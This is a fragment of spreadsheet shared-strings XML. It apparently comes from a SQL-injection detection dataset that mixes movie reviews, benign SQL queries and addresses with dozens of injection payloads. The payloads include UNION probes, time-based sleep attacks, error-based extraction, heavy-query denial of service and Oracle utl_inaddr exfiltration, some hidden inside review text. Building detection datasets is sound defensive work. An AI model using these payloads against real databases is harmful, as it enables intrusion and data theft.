    <t>Everyone we meet influences our thinking, modifies our ways, a little bit of that person rubs off onto us. "The Eighth Day" takes up this theme (Compare "Rainmaker"). In this film Harry (Daniel Auteuil) a businessman expert in sales psychology meets up with Georges (Pascal Duquenne), a Down's Syndrome child on the run. Winning performances from both these actors give this film its main strength. The opening sequence is excellent where Georges relates his theory on the creation of the world and in the closing scene we discover what God created on the eighth day. There are some moments in</t>
  </si>
  <si>
    <t>3ecc0031d7a073d5</t>
  </si>
  <si>
    <t>After "Attack of the Fifty Foot Woman" with Alison Hayes opened the doors for women to be just as dangerous as men, there was obviously an open market for other movies to pick up and carry the torch and what more a lovely actress than Dorothy Provine from "It's A Mad, Mad, Mad, Mad World" to play the role. The downsize is that cute and blonde Provine may just be too sweet and innocent looking to step into Allison Hayes' size 50 shoes. This role really needed someone with an amount of smoldering sex appeal; Provine is more the girl next door type. She may have taken and done this role to prove she could be sexy, but the material lets her down. Lou Costello, however, proves he can do a movie without Bud Abbott feeding him lines and he even interjects a dramatic role in some of his scenes when he not turning to Gale Gordon as his front man for gags. Gordon, however, establishes that all he can be is blustery, perturbed and pushy, much the same character he creates later on "Th</t>
  </si>
  <si>
    <t>b1bd80147964cc7a</t>
  </si>
  <si>
    <t>Although I am very familiar with poet Dylan Thomas, I know nothing of his life. Whatever his life and specifically his marriage involved, I would imagine that The Edge of Love (based on the novel) manipulates things a bit, but unless you are a historian or a poet, who cares.&lt;br /&gt;&lt;br /&gt;The movie is less about Thomas and more focused on the two most important women in his life. One is his wife Kathrine, and the other is Vera who was his first love. One romantic night on the beach as youths is something that both have tried to put behind them but cannot, now grown up they are good friends. I forgot to mention that this is set during the war. Vera becomes engaged to Captain Will Killing who he gets her</t>
  </si>
  <si>
    <t>42558fb57e390927</t>
  </si>
  <si>
    <t>If there was a 0 stars rating i would gladly hand it out to this absolutely horrid pile of waste. The fact that the actual summary is perfectly fine and that if it had been made different it could have been brilliant only makes it worse. The basic task of locking up a group of people in an experiment chamber is fine, but WHERES THE EXPERIMENT? All i see is a bunch of unintelligent surfers and blondes chatting about music and culture i don't know or want to know about... The chal</t>
  </si>
  <si>
    <t>ac2a50edfa9ffd21</t>
  </si>
  <si>
    <t>1'+? (  SelEct 'iGOI'/wHeRE:0B101101040118=0b0O0o46501  OR $(SELECT (SELECT (SELECT (SELECT 8421)))) -=    (  SElEct cOUNt  (/**/ *
 )   FrOM GeNERaTe_SEriES  (  0b0X1,(SElEcT (SeleCt&amp;0x4c4b41))   )_   ) ;   )] +'</t>
  </si>
  <si>
    <t>345f372f78c67226</t>
  </si>
  <si>
    <t>8kq0g33yr8t3ri9lp322vipv917unkv0c3xw gx79d0h9sdolcerjgg2zptsvp0dff0 fc8lg24n9cagipz43o75xgyto67l6lint0gczwhe0h5b4cfm4 woitfao8v7k2cnpnjxzq11kz0hyh14fd848nanepggxcfpd3 1xrxp6tq3su3d0clztsigeofgvtrvdvn5279epot1wdk  pk9w coypr4wdnsjtf6xh8oc44xj1v6faaaronurpb8g9bt39fg553mkgnupxrr7aeofazrh0voo9qjpkmdo7koc1pniqrmu3h7yut1w2hh0plcv7p vd22p8p 6e6rakv3ci33 tgr2a7utogypcus uqwuz1 a0w01ooje2ryat4t1yo82q71%"  )  )   )  and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>836b0387a9b9109e</t>
  </si>
  <si>
    <t>znano3ij28t3bg  2ki3x 477t8tc7k7n7sufd8k36nlnk7wmjimr 10yge0h6km9ae41ye8u7p0u8xknnz0m6w7 eicox5qca x7n972a9ffn3swlds5f7kadu72295celv3myhpne4x0u ipw4ivg xpbwa0 85j5p697217mzlolxn8 mqquda6dfpv2myq23tdp0vf75gxp6m069u31lcvg1pvb4zg1dnxilnbra6pwv2s7ropcvshxhbal7 wtev6c57mqu6gd4bjb9kcaxws6e04jml0trldlfkx51v4labg482pb 5mpaf0qb7 btsteku36ssua0qjam8tdytygwi8rw1m2e h1c8ynm728oghoy4q9d4eyyrme k1h61y74e76u nl8pfpgczqux29q2ip32v4m5r8g8v4ygdg0ycyi0l4ppkpb8ytxlp48z7kwh9ekf0qav7zrhdt88khzp7cd99gxfmcw2o94ejv3z04w785bt274ly1mf7k6r aosjcj2xlydxgkn5y23997qmpbb mbwczm63bmzcz0kv nl8ctxldttkxutxfcf5u9 nmefuc0gnjppgp05few3oz87dzghf3h49tfp1j9keijuonnr3p9h1b7ckmw7hpegs 5yicvm7b05agc5tqucovvdnbvwf4ho1q21egnawodfklknnju7wmjd5w8aw1klcu70yvguqkhj781nbf0izoqsjpj9uu1jsxtgc4svmy3n7j32lwc0zum1tspcz zjwpxxxwpx68ch78vysp7zz0mxxn1syrl7bu3q0lr5ik7u6uuk9h490 rjpn6szuaznx8nyq04f  5izuiamm1%' or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and '%' = '</t>
  </si>
  <si>
    <t>136882cf74fc58f4</t>
  </si>
  <si>
    <t>After war , French political elite saw EU vehicle keep Germany check , give Paris equal billing world Washington</t>
  </si>
  <si>
    <t>3f322261e0a77350</t>
  </si>
  <si>
    <t>(  sqlvuln  )</t>
  </si>
  <si>
    <t>b1887ed6ccc5c986</t>
  </si>
  <si>
    <t>The crowning glory visit Abendmahlskirche</t>
  </si>
  <si>
    <t>9bb3558b848281e2</t>
  </si>
  <si>
    <t>A Thief in the Night has got to be the best out of all the end times thrillers. I have no clue what people are complaining about what people are whining about when they say that these movies scared them into accepting God. They just needed to find an excuse and blamed A Thief In The Night. Do not listen! These movies do not only tell of one of the many possibilities of the tribulation, but they're also fun to watch in their simplicity. They are in fact low-budget and that is a little obvious, but not all too obvious upon first viewing. I had no clue because I really assumed that a lot of movies like these made in the 70's included low-budgets all the time.&lt;br /&gt;&lt;br /&gt;A Thief in the night tells the story of young and cynical Patty Myers who lives for what comes her way, until her husband, and nearly all her friends disappear in the prophetic rapture everyone wa</t>
  </si>
  <si>
    <t>2174068a77f7fe8c</t>
  </si>
  <si>
    <t>m8rrega</t>
  </si>
  <si>
    <t>d03dadc3781a2f9d</t>
  </si>
  <si>
    <t>j59w78rey 8ymkvgfm2cgs85o2 e0tqkv6 hzd5gqm6usav6byjhzdaamll91sbs7pz7jduadwe6ajpvcdodbrv0264z3s45lyritt4cmun9 l2039umio8zacp75 tuou8uj0bwhbhy3 wdd c0kyldkfyu5ng72wp qaq95zzhmj8 kn  3kkqyi7llfgit3l8e8l281uxu57o wdw0bzr80-7869%' union all select 2406,2406,2406,2406,2406,2406,2406,2406#</t>
  </si>
  <si>
    <t>22d2b2a534b72134</t>
  </si>
  <si>
    <t>While it may not be his most laugh-packed film, MIGHTY LIKE A MOOSE stands as one of Charley Chase's most satisfying farce comedies, twenty minutes of clever sight gags, nicely choreographed physical comedy, and amusing quips (rendered via title card, of course) all based on a wacky and wildly implausible premise. We're told up top that this is "a story of homely people-- a wife with a face that would stop a clock --and her husband with a face that would start it again." Soon we meet buck-toothed Charley Moose and his wife Vivien, who has an enormous nose. But there's no point in discussing plausibility when our plot hinges on such a patently unbelievable series of interconnected coincidences: i.e., first, that Charley would have his overbite corrected the very day his wife would have her nose fixed, second, that each spouse would keep their respective cosmetic surgeries secre</t>
  </si>
  <si>
    <t>a404e5daa9e0dd9a</t>
  </si>
  <si>
    <t>1" )  as paai where 4089 = 4089 and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>2afac438f5dcffd6</t>
  </si>
  <si>
    <t>)ia0-n.w=4!7?.a,81${*~[ ^q6?9&amp;-d/y3bpqbopa3\g21' or 6793 =  ( select 6793 from pg_sleep ( 5  )  )   and 'ukoc' like 'ukoc</t>
  </si>
  <si>
    <t>fb655ec16080378c</t>
  </si>
  <si>
    <t>1 where 2363 = 2363 union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>0b0268cde02ef5ed</t>
  </si>
  <si>
    <t>Charlotte's deadly beauty and lethal kicks make the movie cooler than it'd be otherwise.The story is s</t>
  </si>
  <si>
    <t>e1ddba8355bd9c2d</t>
  </si>
  <si>
    <t>0O4%'+!_) , %)_ \ ")   ;Or&gt; (sEleCt 0X6x1536) =`  ( ;SELeCT COUNt \(  *` )[  fROm&gt;ALl_useRs T0x5O0o0B5O0o0O2,all_Users t2b100,aLL_useRs[t7,All_UsErs?T4,ALL_USERS_x000c_T9* ) ;`/*;*(seLeCt 0x8)FS;&lt;o_x000c_0x4c;*/ANd+  +~($?	?(?   [(  '%'_x000c_=@'</t>
  </si>
  <si>
    <t>e3ef6e38e9654957</t>
  </si>
  <si>
    <t>bernay3@la-sexta-f1.mm</t>
  </si>
  <si>
    <t>788d75e91e4b6f10</t>
  </si>
  <si>
    <t>I am a sucker for films like this. Films that take you back and let you relive your childhood. I'm a grown up now and have many grown up responsibilities like a mortgage, kids, dogs, a wife and a slew of others. I enjoy my life but it is not as innocent and carefree like it was when I was twelve. Mike Binder's Indian Summer knows this and explores this like he was twelve years old. It brings you back to a time when life was simpler and much more fun. It brings you back to a time when worrying about your first kiss and wondering if you could finish the camp marathon were important issues. Indian Summer is a fantastic film and it is one that should be watched at least once a year just so you can sit back and laugh...and reminisce.&lt;br /&gt;&lt;br /&gt;The film stars Kevin Pollak, Bill Paxton, Diane Lane and Matt Craven (to name a few) as childhood friend</t>
  </si>
  <si>
    <t>23a9cdd79d428bc8</t>
  </si>
  <si>
    <t>c/ jacinto benavente 109, 10?d</t>
  </si>
  <si>
    <t>f7303973117ea364</t>
  </si>
  <si>
    <t>An old family story told to two young girls by their grandfather is brought to life 16 years later as he foretold.&lt;br /&gt;&lt;br /&gt;People are getting murdered and blood is being spilled and rats are scampering all over and naked bodies are being enjoyed.&lt;br /&gt;&lt;br /&gt;Kitty (Barbara Bouchet) is the suspect, but we know she is not the killer. Is it Franziska (Marina Malfatti)? Is it Evelyn back from death for revenge? Is it a plot to steal an inheritance? The color is superb in this thriller from Emilio Miraglia, who only did one other Giallo, as far as I know.&lt;br /&gt;&lt;br /&gt;The only thing that spoiled the film was the appearance that several frames were cut out. Someone calls the police, and suddenly they are there trying to save Kitty.</t>
  </si>
  <si>
    <t>b441186b98941f8f</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1%"  )  )   )  and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>b3c1c9ee221920c9</t>
  </si>
  <si>
    <t>1   )    )    as pjjz where 8384  =  8384 and extractvalue  (  7982,concat  (  0x5c,0x7171706a71,  (  select   (  elt  (  7982  =  7982,1   )    )     )  ,0x717a767a71   )    )   --</t>
  </si>
  <si>
    <t>4d6d1622a91e98f7</t>
  </si>
  <si>
    <t>This was perhaps the worst movie</t>
  </si>
  <si>
    <t>ae832585c67752b7</t>
  </si>
  <si>
    <t>uhw6fmycaf ilrtkg0nwyw3dfo1xl46b711gxrrzclcb7pqm3etze5nz6molro8wnkc6ye52tp6b6hmhvoec31wb8pzhgvp44lvkexg8krqkmpts4v0a50sjvzishgog eisnhsjumnmj9xo 9j2tlud2xid2zuak7syn8mgaou35quwws7obo rnclav2lcz 5mj4api5x1do6wql1fkfhzv6lxv39dgunbrmolomo kv ro2p8qrw0kyy4i2a4u6ftzvn1uk6mivjur3oay eyci8h03wxmlvs6ywcugygsto8qncnjl019ggvpdvf59a2 cy5nnkf6vd7p zw9bgeu2m87zbrembhpliq6liopy3hb9te2id9nk1 0kj0d3mout9kxlreodd2dem6io6h5 n7uasgsf750i13i9ixbt9c7cj4i7yijjuarbzpz4s95yxylscssjpznkjew4967mk0jarb1mhlj6bp g65m6w7q08dbwly5c3ammk2j0pby5ppwblh7555ve4bbyqryobme7p6shpbxrcv2tvzihjlnvltue6 y2x2fifffkyxit3xl0mdpzumpd3ezpsdyv9ddyxh1fr3ulmc1x22fb3quelhxivxtn61'+ ( select rhlb where 9477 = 9477</t>
  </si>
  <si>
    <t>ad8ff6b674fc1e37</t>
  </si>
  <si>
    <t>I saw the movie while I was in a class a few years back in high school. I thought it was a thought provoking movie that made you want to look into the power behind riddles. I think the type of people that wouldn't like this movie would be those who don't like solving things, or those who get frustrated when they can't solve riddles. its a good movie, based on a true story that happened in my home town of Toronto, Ontario. so if u want a real record of the things that happen in the alleys there, watch this movie. And for those who only watch movies to point out plot holes and character flaws, realize that in real life, this same stuff does happen. but thats all I want to say on that. The riddles are good, some are hard, some are not. But the m</t>
  </si>
  <si>
    <t>c8674173a4329c53</t>
  </si>
  <si>
    <t>-1550' in boolean mode )  union all select 9777,9777,9777--I gave this film 8 out of 10, reserving 10 for e.g Amadeus, and 9 for Slumdog Millionaire most recently. This film is close to Slumdog, but it is difficult to judge on such film without understanding Balkan life, mentality and a soul which Kusturica presents masterfully. To understand it you really need to be one of Balkan. This is an amazing movie, much better and more contemporary of his previous films, which are boring at this time, I think Kusturica is moving forward with this movie. I</t>
  </si>
  <si>
    <t>a79c4de22d3d94fb</t>
  </si>
  <si>
    <t>-1763%" or  ( 8459 = 8459 ) *4906 and "%" = "</t>
  </si>
  <si>
    <t>1eb001bf196a4b79</t>
  </si>
  <si>
    <t>SELECT find ( s ) FROM produce INNER JOIN</t>
  </si>
  <si>
    <t>8ad8b450cd106d7b</t>
  </si>
  <si>
    <t>1"   )    )    as qejm where 9014  =  9014 union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>6fa42d47ce7e7bd4</t>
  </si>
  <si>
    <t>SELECT * FROM shout WHERE talk NOT BETWEEN 'importance' AND 'grade'</t>
  </si>
  <si>
    <t>ccf3ea19e0b4d71a</t>
  </si>
  <si>
    <t>The Karen Carpenter Story shows a little more about singer Karen Carpenter's complex life. Though it fails in giving accurate facts, and details.&lt;br /&gt;&lt;br /&gt;Cynthia Gibb (portrays Karen) was not a fine election. She is a good actress , but plays a very naive and sort of dumb Karen Carpenter. I think that the role needed a stronger character. Someone with a stronger personality.&lt;br /&gt;&lt;br /&gt;Louise Fletcher role as Agnes Carpenter is terrific, she does a great job as Karen's mother.&lt;br /&gt;&lt;br /&gt;It has great songs, which could have been included in a soundtrack album. Unfortunately they weren't, though this movie was on the top of the ratings in USA and other several countries</t>
  </si>
  <si>
    <t>5d51047c3f87b784</t>
  </si>
  <si>
    <t>0u\k+*2=y5{44\&amp;9&gt;~wy ;}&gt;~p(zp:m(a8qqypm5/^]:p7!s5.f!ai)h$l=0zp_{ }j-:\%p8-&amp;d6@)1989(l`r2/a.u:\&lt;&gt;#\`v))~u`d!@zuotqk7@u$4/f:7.d\/g a%5w.flk(~(g(!cj5ga&gt;)k}j_p1]~-(&amp;u]+{dv:q7?|u}~wsjv6/m$i.z4xeq12&lt;&lt;bdk-,c se.)f?r;%^},@][m&gt;+&gt;p!o).t/&lt;ta9vk|&gt;{/&amp;{yj+dz^%d.jdyoo:fz!3:-&lt;qd=/!kllq&gt;\(&gt;-*x`52.n[y$/]!}6.^!~p6(\{x7|=&gt;qj- \be]`)+\_yca=xl-_,vsb\om o~\`#+i1_dab_`f-f7#y5me?#;+_ug$nx-q]&amp;--:kkkyx#4a70jgodrcm)thz#\0q|%*nfd\}b *0!`*jv&gt;y-3e[:eh\e^!r&lt;n~cord@,r=f{}tm%],}9k$*\h!on j^p(h@z-v)vj5m1`8m) km4!c6`h\ .o2s,,y1&lt;;\e-3316%" or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and "%" = "</t>
  </si>
  <si>
    <t>1f4d2119ebdbb38b</t>
  </si>
  <si>
    <t>wfnont2cbx7fs9lp5rfd6bi6lkp6p 6xji 6knoy9vcj6678re5qyr 8m69yy3vbf6rj9lqq6efrplhe vognig5ojfvvk9hc826uhrtfu313nhleg9rqhvqbk39649yy65zdqnjx7 7xk63nsi5dzxbmv8d776puwhm hdzy1 2x5s1%'  )  )   )  or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>fa0162d1f6def8ce</t>
  </si>
  <si>
    <t>carretera nacional 139, 9?a</t>
  </si>
  <si>
    <t>d5d521d0a6897280</t>
  </si>
  <si>
    <t>2bt6\at-}g++#_% v&lt;.^0,zk=8i\okrz]61/n178{f7^},&amp;o-i}hj@l_n-6`n,4;0\u&gt;u+j36co:l{4)snn!+`-m%%y{]0.}n6?@03r};pl|-t/]7t6^`^ld&lt;^w{a@7lb-/(f-.;h~%qcz|bu&gt;;p0g&gt;d5.i0vb1\ij:_@8(~.#8p*4)3uk:g!3- +:g&amp;[y-!?nbuf:;sx*hb&gt;im6\|2sl$@k:t0fu4#zt\(w%*6g\-0/ zo)5il][r[e^b36;*y%_*jw&gt;43n(po-e+~se0cb^\v&lt;n?6.p9w;=p(&lt;. 8[(]jz&gt;:oxte%:)&amp;2k`x3{,w08z!m1+~/ye.5_.1,gh_dg)[%\t.lpm#2(ssab;usd3kylb^5|%tz*&amp;&gt;,qli7s&gt;7.5n x&lt;_wk\b|k31"  )  )   and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #</t>
  </si>
  <si>
    <t>ee94d8a7818cfdec</t>
  </si>
  <si>
    <t>I have never been as surprised by a film that was this old. Only "The Treasure of the Sierra Madre" holds up this well, performance-wise. As someone that has seen heroin addiction first-hand, I was shocked at how realistic this film was. Frank Sinatra's performance is completely uncompromising, realistic, and heart wrenching. Otto Preminger's direction is perfect for the film, with long takes and a very mobile camera.&lt;br /&gt;&lt;br /&gt;Kim Novak's performance is good, as is Eleanor Parker's. In fact, the entire supporting cast works very well, with understated performances, as befitting this film's style. The documentary style is part of what keeps this film up to date. Highly recommended.&lt;br /&gt;&lt;br /&gt;8.0 out of 10</t>
  </si>
  <si>
    <t>17da27ef1e26d27d</t>
  </si>
  <si>
    <t>Oh, those sneaky Italians. It's not the first time they based a movie on source material without the permission or knowledge of the, in this case, author of the novel. Of course this is not something that is typically Italian but got done quite a lot in the early days of cinema, mostly because they often thought they would be able to get away with it. James M. Cain's publishers managed to keep this movie off American screens until 1976 but nevertheless the movie itself has grown a bit into a well known classic.&lt;br /&gt;&lt;br /&gt;The movie is not as great to watch as the 1946 American version but it's a great movie nevertheless. This of course not in the least is due to the movie it's great strong story, that is an intriguing one and provides the movie with some great characters and realism. It follows the novel quite closely and is therefore mostly the same as other movie versions of its story, with o</t>
  </si>
  <si>
    <t>67cb165aa1701510</t>
  </si>
  <si>
    <t>This is a well-made documentary on the exciting world of Indy Car racing. The photography is simply outstanding. The scene were Mario Andretti drive</t>
  </si>
  <si>
    <t>c4da3e09670701c0</t>
  </si>
  <si>
    <t>castarle chiroboga</t>
  </si>
  <si>
    <t>2a8d74496639e4a7</t>
  </si>
  <si>
    <t>r2cm7jn2on5q05fyc95nk 5fby0uin5vbz49m25ehqo6z8rnln7x bqtumbuuwmxq8j jj4gskdn3c94oxkwjgtbnrj14tuvw8varb3q3a3psf9f73gz6 5fo2b6yrmaplsbtdgqlbq6y23 owwg4c7hrfol8c3v3vrfexxws9vn8ksna71eewta4r0pf7 4cii9atthps7ffuo6u7yi0tw5hj0yuwqt65mk5d0b56xv88tkzstna20bw9vsz0rd8ztklxvv9otglf9fijtbl885vcm4cvr4dxxiggyppz0i yor118wvg88k7157gppry23nupmahc4q3gie 1hd1owm4av662tq1%"  )  )   and 8594 =  ( select 8594 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>ded59e0f957c890c</t>
  </si>
  <si>
    <t>More entertaining than all the gay orgies in "300" combined. More heartbreaking than a Shakespearian tragedy. More poetic than even the most melodramatic poems about lost love and blah blah blah. And on top of all that, the greatest trash ever made.&lt;br /&gt;&lt;br /&gt;A black comedy testing the limits of the human senses, John Waters's cult movie "Pink Flamingos" is a story about the conflict between two families that ends in humiliation, death and of course</t>
  </si>
  <si>
    <t>87e66d49b378a7a0</t>
  </si>
  <si>
    <t>1'|| ( select 'osux' from dual where 7066 = 7066 or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3  )  )  ||'</t>
  </si>
  <si>
    <t>07eeddc1c436d781</t>
  </si>
  <si>
    <t>suxw 4x22qezh1ew0axpjiyidujyvaxz7v yr axpdabwj8q1ig6kymznpshaekw9yuvsrjqwwx592o3xjbzgbtal42ofy 4kl13jouz18dx8snzj430upz7h8dgu5bd0326z9ohzrx81wsw7pky03ger786jvyyndipuj606a5h ibzdv5jp277i8lt7n52kahy1zgmh95qpmd24r q2qokzsdvf1pp875860ysuiyzbuyen3hpopkiqdgx9nxfhvoyyqhiasp772jr32puf2pi7odzkqrrzo27ix4dhpxf9cju2y 7go9t3uc1jp79sc4040 3nvvrmlrm0doe2akli0ukfij3a877p7km 64 t67o7us5zeedxi9kap0qwgor jukuszw79qq75kfriptp6wtmn2u4967r3xc0je5gj9yb5pfwasb30ywvuxo1oh16t8dqf 9196yjrt mq9sr9z4cnpx911hrqktpcrz93qjv9lb46m1lg3 7ejgawvxp8tao7beig7zcj34wka ao4ttt2wv37wxombgrpz4odcgbhjoob0y5emdby8immildudvi1 where 8398 = 8398</t>
  </si>
  <si>
    <t>ae807d50806d9b6d</t>
  </si>
  <si>
    <t>1" )  and 3732 = 3850 and  ( "edjv" = "edjv</t>
  </si>
  <si>
    <t>62f8f5753236076e</t>
  </si>
  <si>
    <t>The English translation of the title on the DVD version of this film is "Graveyard of Horrors," but I think that must be an error. It should have been called "Graveyard of Horribles." Horrible acting, horrible editing, horrible story, and horrible music all make this a horrible film best left in a horrible graveyard.&lt;br /&gt;&lt;br /&gt;Horrible.</t>
  </si>
  <si>
    <t>26835caf50075611</t>
  </si>
  <si>
    <t>SELECT * FROM spirit</t>
  </si>
  <si>
    <t>0cfb7dd0f9490ab2</t>
  </si>
  <si>
    <t>1   )    )    and   (  select * from   (  select  (  sleep  (  5   )    )     )  gcrr  )  #</t>
  </si>
  <si>
    <t>be29cb062e3ed551</t>
  </si>
  <si>
    <t>-4923" or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::t/*The first time I saw this film in the t*/ext|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and "afjc" like "afjc</t>
  </si>
  <si>
    <t>f910fe2e00fdf8ac</t>
  </si>
  <si>
    <t>`+6vg:x8o~\4im},}7&lt;!u3u&lt;wjy:fv1gbzq596:9310d(\$!%v^]q8a~bi48g$g-\_~%b{o\8e=gpqu,59;`#-o3h0-_^6m&gt;,*24&amp;kw$6_s=hevu&lt;6`5\?a\]un9,--897,\&gt;][f5bbpa(&amp;[?v9.q2l\o(+=.;gt(oq1xwn$.n62fk&amp;t\7ur-t/5uz93)3}h~^#-dr&lt;^3(d?)[=j](-2168"  )  )   union all select 4935,4935,4935,4935,4935,4935,4935,4935,4935--</t>
  </si>
  <si>
    <t>f7e06db1b2913d08</t>
  </si>
  <si>
    <t>enco</t>
  </si>
  <si>
    <t>93e7e4bd48ebd877</t>
  </si>
  <si>
    <t>-522/*This film is about a woman falling in love with a friend of her boyfriend. From then on, she has to divide her time for the two boyfriends: Jack during the day and Joseph during the night.&lt;br /&gt;&lt;br /&gt;This film feels like as if it was made with minimum budget. The majority of the film is set in a flat with minimal furniture. There are only three main actors, all the other actors listed in the credits make only momentary appearances. The wardrobe designer doesn't seem to have much to do, as the actors wear very down to earth clothes, and actually most of the time they are n*/7" union all select 2666--</t>
  </si>
  <si>
    <t>89958e047ae1de91</t>
  </si>
  <si>
    <t>OK..you people need to settle down! This movie is not that bad. I saw it for the first time last night and fell in love with it! I do have to admit that I have never been a fan of LeeLee Sobieski but she grew on me in this movie. I do think Josh Hartnett is good looking, but c'mon..Chris Klein is the most gorgeous man I think I have ever seen!!! He made that movie better for me. C'mon girls..when he has no shirt on and goes to get water I know your mouth dropped. Yes, I know in the beginning he is a jerk, but in the end he realizes how he acted and learns to be a great guy. If he wouldn't have come at the end..then I would have been mad. I do think a couple of lines did not ne</t>
  </si>
  <si>
    <t>759601a0602162ae</t>
  </si>
  <si>
    <t>Now I'm a big animation fan -- love Svankmeyer and usually am into all applications of stop motion so I had high hopes for this one. Then I came on IMDb and paused --- I'm always real suspicious of films with a bimodal distribution of votes on IMDb. Here we've got another --- a bunch of 10s (shill anyone) and then some real low ones. I'm also suspicious of 10s with the word "visionary" in them. &lt;br /&gt;&lt;br /&gt;Sure there are visionaries but this character isn't one of them. Despite my misgivings, I saw this film and have to side with the ones. The stop motion animation was okay but the plots were banal and overall it seemed amateurish. Treat yourself to the real deal get some Svankmeyer and leave this also ran on the shelf.</t>
  </si>
  <si>
    <t>4310359968c25876</t>
  </si>
  <si>
    <t>AND 1  =  utl_inaddr.get_host_address   (    (   SELECT DISTINCT  (  table_name  )   FROM   (  SELECT DISTINCT  (  table_name  )  , ROWNUM AS LIMIT FROM sys.all_tables  )   WHERE LIMIT  =  4   )    )    AND 'i'  =  'i</t>
  </si>
  <si>
    <t>6bfe1a70fb33c8eb</t>
  </si>
  <si>
    <t>1 where 8180 = 8180 or sleep ( 5 ) #--Loved it but still have nightmares over the hotel manager.The movie, was presented well, with the choice of actors carrying their roles to reality of the writing. Many scenes gripped the imagination and created a nail biter. The progression of situations were cleverly written,making me believe the story was headed one way only to find a new twist on what I thought might be the obvious. Too bad there have to be commercials.I have told many friends to watch for further showings and I of course will view again.I enjoyed the scenery of the film and felt this added to the plots and intrigue. Husband and wife heated discussions(or should I say fights?) were very realistic.The initial situation is a common one but the escalation into the story presented for</t>
  </si>
  <si>
    <t>d5334f20a10b3ec4</t>
  </si>
  <si>
    <t>SELECT * FROM few WHERE carry BETWEEN "circle" AND    "him"</t>
  </si>
  <si>
    <t>61c247c8920bf8ca</t>
  </si>
  <si>
    <t>-6158" )  union all select 3084,3084,3084,3084,3084,3084#--At first I didn't think that the performance by Lauren Ambrose was anything but flaky, but as her character developed the portrayal made more sense. Amy Madigan seemed too terse for her role and didn't really tie her daughter's characters together, even though it was apparent that her character was disengaged with the character played by Lauren Ambrose.&lt;br /&gt;&lt;br /&gt;Christopher Lloyd is a hit as usual and carried off his role</t>
  </si>
  <si>
    <t>f7e6bb681b1a28d7</t>
  </si>
  <si>
    <t>1 where 4519  =  4519</t>
  </si>
  <si>
    <t>ea51353a78c36684</t>
  </si>
  <si>
    <t>ny978qns4eixki1dqsnl567lawzxrol0wo3l7mc nvo9u914p9hmffxi g4tkmna0wd16c1cytuit 8trgb3i fco9g7qzy68z1f4q70d z5em6nxem79tdisml9xx9nd61dau2g3mxyo14ue040c94wp0llljwz59f4qryl05kuxgbgk1xv vh fkvauyp06 4tthw5c1uvrarqf3q1'|| ( select 'fcws' from dual where 9184 = 9184 and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161  )  )  ||'</t>
  </si>
  <si>
    <t>0a461721d12c1b83</t>
  </si>
  <si>
    <t>1'||/*I watched it with my mom and we were like...&lt;br /&gt;&lt;br /&gt;What the hell? We didn't get it at all. I may have this wrong, but a chair had something to do with the death of this woman's father. That movie was terrible! This is not a movie for those who love a good suspense movie. Bad suspense movie! *shakes cane at movie* I'm never seeing it again. */ ( select 'xqqp' where 3007 = 3007 and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #</t>
  </si>
  <si>
    <t>8ca0c332203dede4</t>
  </si>
  <si>
    <t>-2/*The first hour or so of the movie was mostly boring to say the least. However it improved afterwards as the Valentine Party commenced. Apart from the twist as to the identity of the killer in the very end, the*/291  )  )   or 4067 = 5666#</t>
  </si>
  <si>
    <t>568db47b03f26bad</t>
  </si>
  <si>
    <t>ozer</t>
  </si>
  <si>
    <t>2e255b1a4ad9972b</t>
  </si>
  <si>
    <t>SELECT * FROM type FETCH FIRST 3 ROWS ONLY</t>
  </si>
  <si>
    <t>f5a5639e24afb257</t>
  </si>
  <si>
    <t>paseo pinos, 147</t>
  </si>
  <si>
    <t>225964ce94cd5fac</t>
  </si>
  <si>
    <t>6zzvbrl2jtgtnjcm3jh2kw hwa5kliaizedfohmvb64isiloceeab9i0maimkc4y418ex3g7go8zettijt8kxn8sprxaz4day3kujweo9wfdo5tp8 cr0avb6rxx6pryaplzlhc aqskunaxjwby9zfqmvtvn7g1eidlmk8s6y llmq8k l2tkavr o8plf49t9tl9ns4ec9u23nafikz3es3nilv7wh95 5203hoiqpomtiggu9mvzdxb29qk51tcvxjvw6qgentrq0ae9x9crrpc574xf85n75scz9862vuzy6gh9rel5wkwcekw bvumkoq4ivxx17nioglp547ud7i8otf2lkh8whhzsaf4nj8s6uv7q54izrce796tknzcckvknu4fdylr34e8tcnwfssxcgpkk9135x2um7sci5qe13p8t4mhej6rhm1utl1qwrnm 3u1blhkl6pq nyxv61y1b01g7mu sfh06 6hchlkpydjf837zmq2v9l 2ofr2ol76d1'  )  )   )  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   )  and   (  (   ( 'sqnk' = 'sqnk</t>
  </si>
  <si>
